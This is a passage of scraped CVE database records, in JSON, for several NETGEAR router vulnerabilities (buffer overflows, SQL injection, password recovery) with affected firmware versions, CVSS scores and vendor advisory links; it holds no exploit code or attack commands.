"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T14:37:59",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061194/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2018"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20700",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.110, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900P before 1.3.0.10, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:L/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061194/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2018",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061194/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2018"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20700",
"datePublished": "2020-04-16T14:37:59",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:46:10.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20730
Vulnerability from cvelistv5
Published
2020-04-16 19:09
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by SQL injection. This affects D3600 before 1.0.0.68, D6000 before 1.0.0.68, D6200 before 1.1.00.28, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DC112A before 1.0.0.40, EX8000 before 1.0.0.118, JR6150 before 1.0.1.18, R6050 before 1.0.1.18, R6220 before 1.1.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6700v2 before 1.2.0.16, R6800 before 1.2.0.16, R6900v2 before 1.2.0.16, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500 before 1.0.0.118, R7500v2 before 1.0.3.26, R7800 before 1.0.2.40, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.6, R9000 before 1.0.3.10, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.56, and WNDR4500v3 before 1.0.0.56.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.529Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061197/Security-Advisory-for-SQL-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-3056"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by SQL injection. This affects D3600 before 1.0.0.68, D6000 before 1.0.0.68, D6200 before 1.1.00.28, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DC112A before 1.0.0.40, EX8000 before 1.0.0.118, JR6150 before 1.0.1.18, R6050 before 1.0.1.18, R6220 before 1.1.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6700v2 before 1.2.0.16, R6800 before 1.2.0.16, R6900v2 before 1.2.0.16, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500 before 1.0.0.118, R7500v2 before 1.0.3.26, R7800 before 1.0.2.40, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.6, R9000 before 1.0.3.10, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.56, and WNDR4500v3 before 1.0.0.56."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:N/C:H/I:L/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T19:09:31",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061197/Security-Advisory-for-SQL-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-3056"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20730",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by SQL injection. This affects D3600 before 1.0.0.68, D6000 before 1.0.0.68, D6200 before 1.1.00.28, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DC112A before 1.0.0.40, EX8000 before 1.0.0.118, JR6150 before 1.0.1.18, R6050 before 1.0.1.18, R6220 before 1.1.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6700v2 before 1.2.0.16, R6800 before 1.2.0.16, R6900v2 before 1.2.0.16, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500 before 1.0.0.118, R7500v2 before 1.0.3.26, R7800 before 1.0.2.40, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.6, R9000 before 1.0.3.10, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.56, and WNDR4500v3 before 1.0.0.56."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:N/C:H/I:L/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061197/Security-Advisory-for-SQL-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-3056",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061197/Security-Advisory-for-SQL-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-3056"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20730",
"datePublished": "2020-04-16T19:09:31",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.529Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21163
Vulnerability from cvelistv5
Published
2020-04-23 20:17
Modified
2024-08-05 12:26
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6300v2 before 1.0.4.22, R6900P before 1.3.0.18, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.52, and WNDR3400v3 before 1.0.1.18.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:26:38.192Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000055196/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0308"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-03-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6300v2 before 1.0.4.22, R6900P before 1.3.0.18, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.52, and WNDR3400v3 before 1.0.1.18."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T20:17:58",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000055196/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0308"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21163",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6300v2 before 1.0.4.22, R6900P before 1.3.0.18, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.52, and WNDR3400v3 before 1.0.1.18."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000055196/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0308",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000055196/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0308"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21163",
"datePublished": "2020-04-23T20:17:58",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:26:38.192Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18853
Vulnerability from cvelistv5
Published
2020-04-29 13:10
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by password recovery and file access. This affects D8500 1.0.3.27 and earlier, DGN2200v4 1.0.0.82 and earlier, R6300v2 1.0.4.06 and earlier, R6400 1.0.1.20 and earlier, R6400v2 1.0.2.18 and earlier, R6700 1.0.1.22 and earlier, R6900 1.0.1.20 and earlier, R7000 1.0.7.10 and earlier, R7000P 1.0.0.58 and earlier, R7100LG 1.0.0.28 and earlier, R7300DST 1.0.0.52 and earlier, R7900 1.0.1.12 and earlier, R8000 1.0.3.46 and earlier, R8300 1.0.2.86 and earlier, R8500 1.0.2.86 and earlier, WNDR3400v3 1.0.1.8 and earlier, and WNDR4500v2 1.0.0.62 and earlier.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:44.295Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-09-29T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by password recovery and file access. This affects D8500 1.0.3.27 and earlier, DGN2200v4 1.0.0.82 and earlier, R6300v2 1.0.4.06 and earlier, R6400 1.0.1.20 and earlier, R6400v2 1.0.2.18 and earlier, R6700 1.0.1.22 and earlier, R6900 1.0.1.20 and earlier, R7000 1.0.7.10 and earlier, R7000P 1.0.0.58 and earlier, R7100LG 1.0.0.28 and earlier, R7300DST 1.0.0.52 and earlier, R7900 1.0.1.12 and earlier, R8000 1.0.3.46 and earlier, R8300 1.0.2.86 and earlier, R8500 1.0.2.86 and earlier, WNDR3400v3 1.0.1.8 and earlier, and WNDR4500v2 1.0.0.62 and earlier."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:C/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-29T13:10:31",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18853",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by password recovery and file access. This affects D8500 1.0.3.27 and earlier, DGN2200v4 1.0.0.82 and earlier, R6300v2 1.0.4.06 and earlier, R6400 1.0.1.20 and earlier, R6400v2 1.0.2.18 and earlier, R6700 1.0.1.22 and earlier, R6900 1.0.1.20 and earlier, R7000 1.0.7.10 and earlier, R7000P 1.0.0.58 and earlier, R7100LG 1.0.0.28 and earlier, R7300DST 1.0.0.52 and earlier, R7900 1.0.1.12 and earlier, R8000 1.0.3.46 and earlier, R8300 1.0.2.86 and earlier, R8500 1.0.2.86 and earlier, WNDR3400v3 1.0.1.8 and earlier, and WNDR4500v2 1.0.0.62 and earlier."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:C/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18853",
"datePublished": "2020-04-29T13:10:31",
"dateReserved": "2020-04-27T00:00:00",
"dateUpdated": "2024-08-05T21:37:44.295Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2021-45604
Vulnerability from cvelistv5
Published
2021-12-26 00:38
Modified
2024-08-04 04:47
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3.2.18.2, D6220 before 1.0.0.68, D6400 before 1.0.0.102, D8500 before 1.0.3.60, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6300v2 before 1.0.4.50, R6400 before 1.0.1.68, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, and XR1000 before 1.0.0.58.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T04:47:01.868Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://kb.netgear.com/000064526/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-WiFi-Systems-PSV-2020-0572"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3.2.18.2, D6220 before 1.0.0.68, D6400 before 1.0.0.102, D8500 before 1.0.3.60, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6300v2 before 1.0.4.50, R6400 before 1.0.1.68, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, and XR1000 before 1.0.0.58."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:N/I:N/PR:H/S:U/UI:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-12-26T00:38:12",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://kb.netgear.com/000064526/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-WiFi-Systems-PSV-2020-0572"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-45604",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3.2.18.2, D6220 before 1.0.0.68, D6400 before 1.0.0.102, D8500 before 1.0.3.60, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6300v2 before 1.0.4.50, R6400 before 1.0.1.68, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, and XR1000 before 1.0.0.58."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AC:L/AV:A/A:H/C:N/I:N/PR:H/S:U/UI:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000064526/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-WiFi-Systems-PSV-2020-0572",
"refsource": "MISC",
"url": "https://kb.netgear.com/000064526/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-WiFi-Systems-PSV-2020-0572"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-45604",
"datePublished": "2021-12-26T00:38:12",
"dateReserved": "2021-12-25T00:00:00",
"dateUpdated": "2024-08-04T04:47:01.868Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21139
Vulnerability from cvelistv5
Published
2020-04-23 20:12
Modified
2024-08-05 12:26
Severity ?
EPSS score ?
Summary
